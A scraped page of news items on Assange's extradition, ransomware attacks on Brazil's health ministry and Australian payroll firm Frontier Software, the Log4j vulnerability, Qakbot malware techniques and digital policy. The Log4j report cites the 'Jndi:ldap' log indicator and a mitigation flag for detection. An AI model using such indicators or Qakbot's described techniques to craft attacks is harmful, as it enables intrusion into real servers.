Information Technology

A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 

ZDNet Recommends

Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter. This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.” Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US. 

Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 

Government More

Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced them to temporarily remove all connections to their central data center. The company said the shut down was having a “material impact” on their business operations. 

ZDNet Recommends

The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year.In a statement, Hellmann said its Global Crisis Taskforce discovered the attack but outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement.The statement does not say if they were suffering from a ransomware attack, and the company did not respond to requests for comment. This is a particularly inopportune time for a global logistics firm like Hellmann to suffer from a cyberattack considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments.  “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said. 

“The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.” More

Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that resulted in the unavailability of COVID-19 vaccination data of millions of citizens. Following that attack that took place at around 1 am today, all of MoH’s websites including ConecteSUS, which tracks the trajectory of citizens in the public healthcare system, became unavailable. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data has been extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable. The image left by the hackers claiming the Ministry of Health attack Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and whether there are backups for the data allegedly stolen from its systems, the Ministry of Health has not returned requests for comment at the time of writing. The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. The attack was focused on the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. The attack took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, whereby Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, as a response to the rise of the omicron variant. This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients were leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub. Less than a week later, another major security incident emerged. The personal information of more than 243 million Brazilians, including alive and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.

ZDNet Recommends More

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild.CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerabilities. 

ZDNet Recommends

Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. SEE: A winning strategy for cybersecurity (ZDNet special report) The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It’s also used in enterprise applications and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.” Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected. In order to mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application. To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1. “If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
MORE ON CYBERSECURITY More

Qakbot, a top trojan for stealing bank credentials, has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn’t a Qakbot attack. Qakbot, is an especially versatile piece of malware, and has been around for over a decade and survived despite multi-year efforts by Microsoft and other security firms to stamp it out. Qakbot in 2017 adopted WannaCry’s lateral movement techniques, such as infecting all network shares and drives, brute forcing Active Directory accounts and using the SMB file-sharing protocol to create copies of itself.   

ZDNet Recommends

Kaspersky’s recent analysis of Qakbot concluded that it won’t disappear anytime soon. Its detection statistics for Qakbot indicated it had infected 65% more PCs between January to July 2021 compared to the same period in the previous year. So, it is a growing threat.SEE: Hackers are turning to this simple technique to install their malware on PCsMicrosoft highlights that Qakbot is modular, allowing it to appear as separate attacks on each device on a network, making it difficult for defenders and security tools to detect, prevent and remove. It’s also difficult for defenders to detect because Qakbot is used to distribute multiple variants of ransomware. “Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely,” the Microsoft 365 Defender Threat Intelligence Team say in its report. Given these difficulties pinpointing a common Qakbot campaign, the Microsoft team has profiled the malware’s techniques and behaviors to help security analysts root out this versatile malware. 

The primary delivery mechanism is emailed attachments, links, or embedded images. However, it’s also known to use Visual Basic for Applications (VBA) macros as well as legacy Excel 4.0 macros to infect machines. TrendMicro analyzed a large Qakbot campaign in July that used this technique. Other groups like Trickbot recently started using Excel 4.0 macros to call Win32 APIs and run shell commands. As a result, Microsoft disabled these macro types by default, but Qakbot uses text in an Excel document to trick targets into manually enabling the macro.   Qakbot employs process injection to hide malicious processes, creating scheduled tasks to persist on a machine, and manipulating the Windows registry. Once running on an infected device, it uses multiple techniques for lateral movement, employs the Cobalt Strike penetration-testing framework, or deploys ransomware. The FBI last year warned that Qakbot trojans were delivering ProLock, a “human-operated ransomware” variant. It was a worrying development because computers infected with Qakbot on a network must be isolated because they’re a bridge for a ransomware attack.Microsoft notes MSRA.exe and Mobsync.exe have been used by Qakbot for this process injection in order to run several network ‘discovery’ commands and then steal Windows credentials and browser data. Qakbot’s Cobalt Strike module lends itself to other criminal gangs who can drop their own payloads, such as ransomware. Per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor, and ProLock (2020), and Sodinokibi/REvil (2021). “Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads,” Microsoft notes. “Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.”Microsoft’s recommended mitigations to minimize Qakbot’s impact include enabling Office 365 phishing protection, enabling SmartScreen and network in the Edge browser, and ensuring runtime macro scanning by turning Windows Antimalware Scan Interface (AMSI) on. AMSI is supported by Microsoft Defender antivirus and several third-party antivirus vendors. AMSI support for Excel 4.0 macros arrived in March, so it’s still a relatively new feature.   More

Singapore and the UK have wrapped up negotiations on a digital economy agreement that focuses on digital trade, data flows, and cybersecurity. Under the pact, both nations will look to establish, amongst others, interoperable systems for digital payments, secured data flows, and digital identities, as well as collaborate on cybersecurity. When formally inked, the digital economy agreement would be Singapore’s third following two others it signed with Chile and New Zealand as well as Australia. The UK agreement included “binding disciplines” of the digital economy such as data, and cooperation in emerging areas including artificial intelligence, fintech, digital identities, and legal technology. 

Common digital systems, for instance, would be put in place to facilitate e-payments, e-invoicing, and other electronic documents such as bills of lading. The goal here was to drive faster and cheaper transactions, reducing costs for businesses in both markets. internThe two countries also would look to enable trusted data flows and data protection for various functions, including financial services. In addition, a “trusted and secure digital environment” would be critical to drive and safeguard participation for both businesses and consumers. For example, private cryptography keys and embedded algorithms would help secure an organisation’s source codes, while consumers should be protected against fraudulent and deceptive online behaviour. For a start, government agencies from both sides last week signed three Memoranda of Understanding (MOUs) in digital trade, digital identities, and cybersecurity. Collectively, these aimed to facilitate cross-border services between Singapore and the UK, which bilateral trade services tipped at SG$22 billion ($16.02 billion) in 2019. 

Some 70% of the UK’s cross-border services exports to Singapore in 2019 also were digitally processed, totalling £3.2 billion ($4.23 billion). The UK is Singapore’s largest services trading partner in Europe and the Asian economy’s second-largest European investor and European investment destination, with more than SG$100 billion ($72.81 billion) of UK investment stock in Singapore. Under the digital trade MOU, a scheme would be piloted to simulate the transfer of electronic bills of lading, with the aim to ease cross-border trade transactions. Digitalising this process helped cut cost and transaction time as well as reduce fraud. The MOU on digital identities looked to develop mutual recognition and interoperability between both countries’ digital identity regimes. The goal here was to establish more reliable identity verification and more quickly process applications. In cybersecurity, the two nations hoped to build on a shared goal of “addressing international challenges” and promoting bilateral collaboration to bolster cybersecurity, including in Internet of Things (IoT), capacity building, and cyber resilience.Singapore’s Minister-in-charge of Trade Relations S. Iswaran said: “Singapore’s digital economy agreements build on and enhance the economic connectivity established through our extensive network of free trade agreements. Reflecting our shared ambition, the UK-Singapore Digital Economy Agreement builds upon and, in some areas, goes further than our existing agreements. It will set a global benchmark for high-standard digital trade rules and benefit people and businesses in our two countries.”Negotiations for the Singapore-UK digital trade agreement kicked off in June 2021. RELATED COVERAGE More

A parliamentary joint committee is currently considering whether social media platforms should be regulated as carriage service providers given the amount of communications and content sent through them. Various experts have submitted to the committee that social media platforms like Facebook are of such a significant scale and are so uniquely pertinent to the problem of online child exploitation that they should be subject to additional scrutiny, such as being regulated as carriage service providers. The considerations are part of the Parliamentary Joint Committee on Law Enforcement’s inquiry into Australia’s law enforcement capabilities in relation to child exploitation. During a joint parliamentary hearing on Friday, Meta told the committee that it believes Australia’s framework for law enforcement working with social media platforms to detect child abuse material is already sufficient, and that the additional classification could be redundant. “We’ve set up a dedicated portal, we have dedicated team to liaise with law enforcement, and then we can disclose what we call basic subscriber information data quite quickly through that process. We obviously have emergency channels if there’s any threat to life; either we proactively disclose or law enforcement can ask us for assistance through those emergency processes,” said Mia Garlick, Meta Australia New Zealand Pacific Islands public policy director. “So I guess from where [Meta] sits in terms of our engagement with law enforcement, we feel that there is already sort of a good way to get there and so it might not be necessary to sort of tinker with definitions in the Telecommunications Act when we’ve got the ability to work constructively through the existing frameworks.” While the eSafety commissioner said last month that social media platforms have primarily done a good job of removing abhorrent violent material, it noted in its submission to the committee that the approach to detecting and removing child abuse material is different partly due to this type of content primarily being distributed through private communication channels.

The government agency also said that as more social media platforms move towards encrypted communications, this dynamic could effectively create “digital hiding places”. It shared its worry that platforms may also claim they are absolved of responsibility for safety because they cannot act on what they cannot see. eSafety online content manager Alex Ash told the committee yesterday afternoon that a drift towards encrypted communications by major social media platforms would make investigations into serious online child sexual abuse and exploitation more difficult. He did note, however, that in instances where eSafety was able to detect such material on social media platforms, platforms have been cooperative and quick to respond to these flagged materials. To address these concerns regarding the growing shift toward encrypted communications, the committee on Friday sought consultation on the merits of communications to and from minors aged 13-18 being exempt from encryption from a technical standpoint, as well as whether such a framework was technically possible. Meta’s Safety head Antigone Davis said while it may be possible to create a partial encryption system, she believes it would come at the cost of undermining encryption for other individuals engaging on the platform. As a counterpoint, Davis said her company believes it would be possible to build protections into an encrypted service through mechanisms such as enabling the blurring of images, preventing people from being able to contact minors, making it easier for users to report child abuse material, and using non-encrypted information to catch people who proliferate child abuse material. “While they may obfuscate some of what they’re doing, what we do find is that they do leave trails, they do leave what you might think of as prompts. So for example, you may see people have this kind of interest, provoked sexualised comments under minors, or you may see what will look like an innocuous bringing together of lots of photos of minors that appear innocuous … so there are opportunities to actually use those breadcrumbs,” Davis said. Communications Alliance program management director Christiane Gillespie-Jones, who also appeared before the committee, provided a slightly different picture of how encrypted communications could affect law enforcement’s ability to detect child abuse material. While Gillespie-Jones agreed with Meta’s sentiment that encrypted communications were important for user privacy, after being questioned about its impact on detecting child abuse material, Gillespie-Jones acknowledged the possibility that encrypted communications could make certain child abuse material no longer discoverable.In terms of how much more difficulty encrypted communications would add to detecting such material, Gillespie-Jones said this was currently unquantifiable. Related Coverage More

Image: Mashka/Shutterstock
South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software. Lucas said the company has informed government that some of the data have been published online, with at least 38,000 employees and up to 80,000 government employees possibly having their data accessed. The data contained information on names, date of birth, tax file number, home address, bank account details, employment start date, payroll period, remuneration, and other payroll-related information. “We can confirm that no Department for Education employees are affected,” Lucas said in a statement. “The government’s priority is the safety and security of every employee affected by this incident, and we are doing all we can to provide assistance to impacted employees.” Frontier Software has been handling payroll for South Australia since 2001. On its site, the government states it “undertakes regular independent security tests and reviews” of Frontier Software.

Last month, Frontier Software was attacked on November 13 and alerted its customers to what it labelled as a “cyber incident” on November 16. It said its systems were restored on November 17. “To date, our investigations show no evidence of any customer data being exfiltrated or stolen. Whilst the incident resulted in some of Frontier Software’s Australian corporate systems being encrypted, Australian customer HR & Payroll data and systems are segmented from the corporate systems and were not compromised,” it said on November 17. On Thursday, the company sang a different tune. “The ongoing forensic investigation and other response activities conducted by Frontier Software and CyberCX has now confirmed evidence of some data exfiltration from Frontier Software’s internal Australian corporate environment,” it said. “We have not identified evidence of compromise or exfiltration outside this segmented environment. “We have further identified that some of the data exfiltrated from our internal corporate environment relates to a small number of Frontier Software customers. We are now in the process of directly notifying these customers that they may be affected.” During November, the ABC reported Federal Group, the owners of Hobart’s Wrest Point casino, had to make advance payments of AU$250 to staff due to the attack on Frontier Software. Related Coverage More